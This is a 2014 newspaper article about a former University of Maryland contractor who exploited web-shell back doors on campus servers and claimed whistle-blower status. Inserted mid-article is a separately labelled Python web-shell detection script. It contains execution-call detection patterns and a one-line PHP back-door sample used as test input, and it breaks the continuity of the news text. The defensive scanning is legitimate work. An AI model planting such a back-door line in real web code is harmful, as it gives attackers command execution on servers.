Former contract worker at UM says he accessed data to reveal problems
By SCOTT DANCE and The Baltimore Sun
Apr 09, 2014 | 9:50 PM
The FBI is investigating a former University of Maryland contract worker who said he took College Park administrators' personal information from the campus network and posted online about the stunt to draw attention to major security flaws.
David Helkowski said in an interview with The Baltimore Sun that he noticed vulnerabilities months before a February attack exposed nearly 300,000 sensitive records. Frustrated that issues continued even after he raised concerns while working on a university website, Helkowski said, he took the data to raise alarm.
FBI agents raided Helkowski's Parkville home last month after linking him to the breach, which exposed information including university President Wallace D. Loh's Social Security and cellphone numbers, according to court documents filed Monday.
Helkowski has not been charged with any wrongdoing, and he said in the interview that he considers himself a whistle-blower.
"I had to do it because if I did not do that, they wouldn't have acknowledged the seriousness of the problem," he said.
He said there may have been multiple points of entry through which hackers could have obtained sensitive information from the university's network, though his findings may not have prevented the breach of names, Social Security numbers and birth dates of 287,580 students, faculty and staff Feb. 18.
University officials said Helkowski did not access the data in the same way the larger breach occurred, but they declined to comment further, citing ongoing investigations.
The situation adds to a debate over the ethics of hacking. In many cases, online invaders cast themselves as heroes, like volunteer Internet police maintaining safety for consumers, but experts say hacking into sensitive data remains an ethical gray area — and can be illegal.
Helkowski said he was working on a website for the university's School of Public Health in November as an employee of the Canton Group when his computer's virus scanner popped up an alert.
It led him to a vulnerability that gave access to 80 databases, including some containing Social Security numbers, cellphone numbers and grades, he said.
An unusual batch of code appeared to have been uploaded to the website, and Helkowski said he later found similar code on other university websites. Known as shell scripts, these sets of code wrap together multiple commands that can be activated at once.
The shell scripts created a back door into the servers running the websites, which an attacker could use to access all the databases, he said. A web server is typically designed to connect only to the sources of data it needs to run, keeping sensitive or extraneous data separate and accessible only to those with the proper authorization.
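The planted scripts described above are what a defender would look for as a web-shell back door: a script under the web root that passes request input into a command-execution call. The following is an added example, not code from the article, the university, or the Canton Group; it builds a constructed sample web root (file names and contents are invented for the demonstration) and scans it for that indicator pattern, while leaving a legitimate maintenance script that runs a fixed command unflagged.

```python
"""Added example (not from the article): scan a web root for script files in
which a command-execution or code-eval call sits close to a reference to
request input, the shape a web-shell back door typically takes.
All sample files are constructed here for the demonstration."""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List

# Execution primitives in PHP and similar scripting languages (illustrative,
# not an exhaustive signature set).
EXEC_CALL_RE = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(",
    re.IGNORECASE,
)
# Request-controlled input: the thing a back door feeds into the call above.
REQUEST_INPUT_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# Characters of context around an execution call to search for request input,
# so a variable assigned from $_GET a line earlier is still caught.
WINDOW = 200
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".cgi", ".pl", ".sh"}


@dataclass
class Finding:
    path: str
    line_no: int


def scan_text(text: str) -> List[int]:
    """Return line numbers of execution calls that have request input nearby."""
    hits = []
    for m in EXEC_CALL_RE.finditer(text):
        context = text[max(0, m.start() - WINDOW): m.end() + WINDOW]
        if REQUEST_INPUT_RE.search(context):
            hits.append(text.count("\n", 0, m.start()) + 1)
    return hits


def scan_web_root(root: str) -> List[Finding]:
    """Walk the web root and scan every file with a script extension."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no in scan_text(fh.read()):
                    findings.append(Finding(path, line_no))
    return findings


def build_sample_web_root() -> str:
    """Constructed sample web root: two legitimate files and one planted script."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        # Legitimate page: no execution primitive at all.
        "index.php": "<?php\n// Constructed page.\necho '<h1>School of Public Health</h1>';\n",
        # Legitimate maintenance script: fixed command, no request input nearby.
        "maintenance.php": (
            "<?php\n// Constructed admin script with a hard-coded command.\n"
            "$out = shell_exec('df -h');\necho nl2br(htmlspecialchars($out));\n"
        ),
        # Constructed back-door sample used only as detection test input.
        "cache_helper.php": (
            "<?php\n// Constructed sample of a planted script (test input only).\n"
            "$c = $_REQUEST['c'];\necho shell_exec($c);\n"
        ),
        # Non-script upload: skipped by extension.
        "logo.jpg": "not really an image\n",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in scan_web_root(build_sample_web_root()):
        print(f"suspicious execution call: {f.path}:{f.line_no}")
```

In practice this kind of scan is run against a known-good baseline (a hash list or a clean checkout of the site) so that only files added or changed since deployment need a closer look; the proximity window trades some precision for catching the common two-line form where the request parameter is copied into a variable first.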
Helkowski said he alerted his superiors at the Canton Group to the vulnerability when he found it in November, and again after Loh disclosed the data breach in February.
Convinced that his concerns were not being heard, Helkowski said he exploited the flaw from the outside, though he says he didn't access anything he didn't have permission to in his role at Canton Group.
"I was not gaining any more access than I already had officially," he said.
He said he sent an email March 15 to Loh and other members of a task force the university created to investigate the cyber attack, notifying them of his breach and warning them of a need to further tighten security.
The university revealed the breach March 20, but offered few details other than to say it exposed the personal information of a school official.
"I want UMD security to actually be improved, not just for people to say it is being improved," Helkowski wrote in a posting on the website pastebin.com in which he acknowledged, "I could very well get in a lot of trouble."
Helkowski said he and university information security officials traded emails after that, discussing the vulnerability and how to fix it. He said university officials thanked him. But the next day, FBI officials raided his home in the 8300 block of Oakleigh Road.
Helkowski said he cooperated with FBI agents, providing usernames and passwords as they combed his house for evidence, including flash drive storage devices, hard drives, a laptop and a document containing the terms of his employment with Canton Group. After telling his employers about the raid, he was let go, he said.
Helkowski publicly revealed details of the hacking on Wednesday to users of the website Reddit, in one of the message board's "Ask Me Anything" discussions.
Canton Group officials said in a statement that Helkowski is no longer employed there and that they are cooperating with all law enforcement investigations.
An FBI spokeswoman could not be reached for comment.
Helkowski said his aim was to improve information security, but FBI special agent Jeremy Bucalo cited in an affidavit probable cause that Helkowski violated the federal law that bans unauthorized access to a protected computer.
Though so-called "white-hat" hackers — who intend to improve security rather than profit from breaches — may have good intentions, they can still rile their targets, as well as law enforcement agencies.
Universities in Canada and the United Kingdom have prosecuted self-proclaimed white-hat hackers.
In the U.S., hacker Andrew Alan Escher Auernheimer was sentenced to more than three years in prison and ordered to pay $73,000 in restitution for a breach of AT&T that exposed data on 114,000 iPad users, despite claiming to be one of "the good guys."
"If you haven't been specifically contracted to test a system, if you don't have in writing that this is going to be acceptable to an organization, it's something you should steer away from," said Lisa Yeo, an assistant professor of information systems and operations management at Loyola University Maryland. "You can't trust those people to always be willing to play by the rules. It's a very gray area."